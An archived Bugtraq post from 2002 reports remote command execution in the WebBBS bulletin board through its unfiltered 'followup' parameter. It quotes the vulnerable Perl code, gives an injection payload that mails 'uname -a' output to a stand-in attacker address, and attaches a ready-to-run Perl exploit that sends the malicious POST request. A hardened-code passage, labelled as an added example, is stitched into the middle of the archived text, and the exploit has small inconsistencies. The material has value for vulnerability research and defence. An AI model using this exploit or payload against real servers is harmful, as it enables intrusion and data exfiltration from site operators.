Bugtraq mailing list archives

WebBBS 5.0 (and later versions) vulnerable: allows command execution via "followup" bug


From: nerf gr0up nerf <vipersv () mail ru>
Date: 18 Jun 2002 18:39:58 -0000



                --== Nerf gr0up: adv #7 ==--  
                     WebBBS remote command execution

Vulnerable:
WebBBS by Darryl Burgdorf 
(http://awsd.com/scripts/webbbs/).
All versions are vulnerable.
WebBBS is a Web-based bulletin board. WebBBS stores 
messages as simple text files.

Description:
The WebBBS script allows command execution on the server.
The script does no filtering of the "followup" parameter,
and because of this remote command execution is possible.

The vulnerable code is shown below:
-----
webbbs_post.pl: 

...
if ($FORM{'followup'}) { $followup = "$FORM{'followup'}"; }
...
if ($followup) {
...
                $subdir = "bbs".int($followup/1000);
                open (FOLLOWUP,"$dir/$subdir/$followup");
...
-----

Just change the value of the followup parameter, e.g. from
"followup=10" to
"followup=10;uname -a|mail zlo () evil com|", to exploit
this vulnerability. The two-argument open() treats a filename
ending in "|" as a command to run, so the value is passed to the
shell instead of being opened as a file.
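As an added example that is not part of the advisory or of WebBBS's own code, a hardened form of the follow-up lookup: the identifier is restricted to digits (which also untaints it under -T) and the file is opened with three-argument open, so a trailing "|" can no longer turn the filename into a command. The names followup_path and read_followup and the /var/www/bbs path are assumptions.

```perl
#!/usr/bin/perl -T
# Hardened replacement for the "followup" file lookup in webbbs_post.pl.
# Added example, not WebBBS code; function names and paths are assumed.
use strict;
use warnings;

# Build the message path, or return undef unless the identifier is a
# plain unsigned integer. Shell metacharacters, "..", and leading or
# trailing pipes are all rejected here, and the capture untaints the
# value when the script runs under -T.
sub followup_path {
    my ($dir, $followup) = @_;
    return undef unless defined $followup && $followup =~ /\A(\d{1,9})\z/;
    my $id = $1;
    my $subdir = "bbs" . int($id / 1000);   # same layout as the advisory
    return "$dir/$subdir/$id";
}

# Read the follow-up message, or return undef if the id is invalid or
# the file cannot be opened.
sub read_followup {
    my ($dir, $followup) = @_;
    my $path = followup_path($dir, $followup);
    return undef unless defined $path;
    # Three-argument open with an explicit read mode: the filename is
    # never parsed for "|", ">" or "<", so it cannot start a process.
    open(my $fh, '<', $path) or return undef;
    local $/;
    my $text = <$fh>;
    close $fh;
    return $text;
}

# Self-check on constructed inputs (no files are touched).
my $dir = "/var/www/bbs";   # constructed path
print followup_path($dir, "10"), "\n";      # /var/www/bbs/bbs0/10
print followup_path($dir, "12345"), "\n";   # /var/www/bbs/bbs12/12345
for my $bad ("10;uname -a|", "../../etc/passwd", "10\n") {
    print defined followup_path($dir, $bad) ? "accepted" : "rejected", "\n";
}
```

Running the script under -T is what makes the untainting capture matter: without it, a tainted value that slipped past validation would still reach open() silently.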

btr
nerf
www.nerf.ru

Attachment (exploit in Perl):

#!/usr/bin/perl
#
#  nerF gr0up
#
#  exploit code for
#  WebBBS by Darryl C. Burgdorf
#  all versions up to 5.00 are vulnerable
#
#
#  this is an exploitation of the "followup" bug.
#  it allows a remote attacker to execute shell commands.
#  you can find the WebBBS script at http://awsd.com/scripts/webbbs/
#
#  06.06.2002
#  btr // nerf
#  nerf.ru

use IO::Socket;

        srand();
        $script = "/cgi-bin/webbbs/webbbs_config.pl";
        $command = "uname -a|mail zlo () evil com";
        $host = "localhost";
        $port = 80;

        # build the POST body; random values fill the required fields
        $content = "$content" . "name=" . rand(254);
        $content = "$content" . "&email=" . rand(254);
        $content = "$content" . "&subject=" . rand(254);
        $content = "$content" . "&body=" . rand(254);
        $content = "$content" . "&followup=" . rand(254) . "|$command|";

        $content_length = length($content);
        $content_type = "application/x-www-form-urlencoded";

        # optional overrides: command, host, script path
        if (@ARGV[0]) {$command=@ARGV[0];}
        if (@ARGV[1]) {$host=@ARGV[1];}
        if (@ARGV[2]) {$script=@ARGV[2];}

        $buf = "POST " . "$script" . "?post HTTP/1.0\n";
        $buf = "$buf" . "Content-Type: $content_type\r\nContent-Length:";
        $buf = "$buf" . "$content_length\r\n\r\n$content", 0;

        print "\tnerF gr0up\n";
        print "exploit: WebBBS (awsd.com), version up to 5.00\n";

        print "sent:\n$buf\n";

if($socket = IO::Socket::INET->new("$host:$port")){

        print $socket "$buf";
        read($socket,$buf,1500);
        print "received:\n$buf\n";
}
